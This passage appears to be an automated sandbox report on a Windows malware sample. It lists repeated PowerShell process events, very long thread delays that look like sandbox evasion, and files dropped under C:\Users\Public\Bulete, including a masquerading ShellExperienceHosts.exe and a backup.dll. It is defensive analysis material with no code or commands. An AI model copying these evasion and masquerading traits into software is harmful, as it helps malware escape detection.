Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exeWindow / User API: threadDelayed 5923Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4589Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 8358Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1292Jump to behavior
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\backup.dllJump to dropped file
Source: C:\Users\user\Desktop\S1Rv3ioghk.exeDropped PE file which has not been started: C:\Users\Public\Bulete\wps_lid.lid-s8HDMqE8a6Xy.exeJump to dropped file
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exeAPI coverage: 7.7 %
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe TID: 4180Thread sleep time: -73000s >= -30000sJump to behavior
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe TID: 1016Thread sleep time: -63000s >= -30000sJump to behavior
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe TID: 3020Thread sleep time: -30000s >= -30000sJump to behavior
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe TID: 4592Thread sleep time: -59230s >= -30000sJump to behavior
Source: C:\Windows\SysWOW64\timeout.exe TID: 5472Thread sleep count: 253 > 30Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3428Thread sleep count: 4589 > 30Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5224Thread sleep count: 229 > 30Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3396Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4504Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6364Thread sleep count: 8358 > 30Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2792Thread sleep count: 1292 > 30Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6584Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Windows\SysWOW64\timeout.exe TID: 3964Thread sleep count: 269 > 30Jump to behavior
Source: C:\Windows\SysWOW64\timeout.exe TID: 4092Thread sleep count: 268 > 30
Source: C:\Windows\SysWOW64\timeout.exe TID: 6428Thread sleep count: 193 > 30
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\SysWOW64\timeout.exeLast function: Thread delayed
